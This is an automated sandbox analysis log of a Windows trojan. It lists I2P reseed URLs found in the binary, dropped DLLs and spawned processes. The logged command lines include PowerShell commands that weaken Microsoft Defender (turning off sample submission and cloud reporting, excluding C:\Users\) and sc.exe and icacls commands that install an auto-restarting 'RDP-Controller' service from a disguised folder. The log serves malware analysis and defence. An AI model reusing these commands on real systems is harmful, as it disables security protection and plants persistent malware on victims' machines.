Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000003.2979115871.000002204C927000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000003.2978974700.000002204C921000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drString found in binary or memory: http://127.0.0.1:8118
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drString found in binary or memory: http://identiguy.i2p/hosts.txt
Source: main.exe, main.exe, 00000022.00000002.3266524033.000002204CD5C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, XFS8JZFg.24.drString found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtj
Source: main.exe, 00000018.00000002.2875358627.0000021B1704C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtp_lib.cwJ
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drString found in binary or memory: http://rus.i2p/hosts.txt
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, XFS8JZFg.24.drString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3
Source: main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drString found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://banana.incognet.io/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://banana.incognet.io/b.cM
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i2p.ghativega.in/
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drString found in binary or memory: https://i2p.mooo.com/netDb/
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i2p.novg.net/
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drString found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: main.exe, main.exe, 00000022.00000002.3266524033.000002204CD00000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drString found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drString found in binary or memory: https://netdb.i2p2.no/
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: main.exe, 00000018.00000002.2875167256.0000021B16C37000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-fr.i2pd.xyz/b.c
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.diva.exchange/
Source: main.exe, 00000018.00000002.2875167256.0000021B16C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.diva.exchange/b.c
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.drString found in binary or memory: https://reseed.i2p-projekt.de/
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/b.cQ
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.memcpy.io/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.memcpy.io/p/p_lib.c
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/$
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/
Source: main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/vp/p_lib.c
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2875167256.0000021B16BD8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000018.00000002.2876686721.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.mk16.de/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBA929A inet_addr,ntohl,6_2_00007FF66EBA929A
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBB0779 CreateProcessAsUserA,6_2_00007FF66EBB0779
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile deleted: C:\Windows\Temp\o1i2PUnI
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02BA53FA0_2_02BA53FA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B94B560_2_02B94B56
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B95B4A0_2_02B95B4A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B960DA0_2_02B960DA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02BA702E0_2_02BA702E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02BAD1320_2_02BAD132
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B97F3A0_2_02B97F3A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B9CDB20_2_02B9CDB2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B99D020_2_02B99D02
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBADE8A6_2_00007FF66EBADE8A
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBAE4E06_2_00007FF66EBAE4E0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FF70CAE1AB024_2_00007FF70CAE1AB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FF70CADC44024_2_00007FF70CADC440
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA558088024_2_00007FFDA5580880
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B24D024_2_00007FFDA55B24D0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55DEF6024_2_00007FFDA55DEF60
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA5BACB1024_2_00007FFDA5BACB10
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDAC0FEAA024_2_00007FFDAC0FEAA0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDAC13048024_2_00007FFDAC130480
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDAC128CDB24_2_00007FFDAC128CDB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDAC128DC624_2_00007FFDAC128DC6
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDAC128F0E24_2_00007FFDAC128F0E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDAC128FFC24_2_00007FFDAC128FFC
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
Source: C:\Windows\System32\icacls.exeProcess token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: String function: 00007FF66EBA14E2 appears 295 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFDAC0F1352 appears 398 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFDA55AC852 appears 526 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF70CAD2EF2 appears 314 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFDA5BA2072 appears 356 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFDA55D9DC2 appears 405 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFDA55740D2 appears 473 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFDAC1277A2 appears 388 times
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 452 -p 5252 -ip 5252
Source: evtsrv.dll.24.drStatic PE information: Number of sections : 11 > 10
Source: m28TQ56q.24.drStatic PE information: Number of sections : 11 > 10
Source: rdpctl.dll.24.drStatic PE information: Number of sections : 11 > 10
Source: o1i2PUnI.24.drStatic PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.24.drStatic PE information: Number of sections : 11 > 10
Source: ZNdEbgqy.24.drStatic PE information: Number of sections : 11 > 10
Source: cnccli.dll.24.drStatic PE information: Number of sections : 11 > 10
Source: 459WBsWA.24.drStatic PE information: Number of sections : 11 > 10
Source: CheAuE4k.24.drStatic PE information: Number of sections : 11 > 10
Source: SCKoP3sQ.24.drStatic PE information: Number of sections : 11 > 10
Source: OKh5fbg5.24.drStatic PE information: Number of sections : 11 > 10
Source: file.exeStatic PE information: Number of sections : 11 > 10
Source: prgmgr.dll.24.drStatic PE information: Number of sections : 11 > 10
Source: libi2p.dll.24.drStatic PE information: Number of sections : 11 > 10
Source: samctl.dll.24.drStatic PE information: Number of sections : 11 > 10
Source: termsrv32.dll.24.drStatic PE information: Number of sections : 11 > 10
Source: nVYOsq5a.24.drStatic PE information: Number of sections : 11 > 10
Source: file.exe, 00000000.00000000.2124527695.00000000008B0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe
Source: file.exe, 00000000.00000002.2128413012.0000000002588000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: file.exe, 00000001.00000002.3366191152.0000000002818000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: classification engineClassification label: mal100.troj.evad.winEXE@51/74@2/25
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBA855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,6_2_00007FF66EBA855D
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBA1A19 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,6_2_00007FF66EBA1A19
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FF70CAD1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,24_2_00007FF70CAD1DBC
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FF70CAD1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,24_2_00007FF70CAD1DBC
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5092:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2156:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess5252
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess5164
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5968:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5128:120:WilError_03
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.batJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat"
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeFile read: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe "C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe "C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe"
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 452 -p 5252 -ip 5252
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5252 -s 1184
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 520 -p 5164 -ip 5164
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5164 -s 1112
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat"Jump to behavior
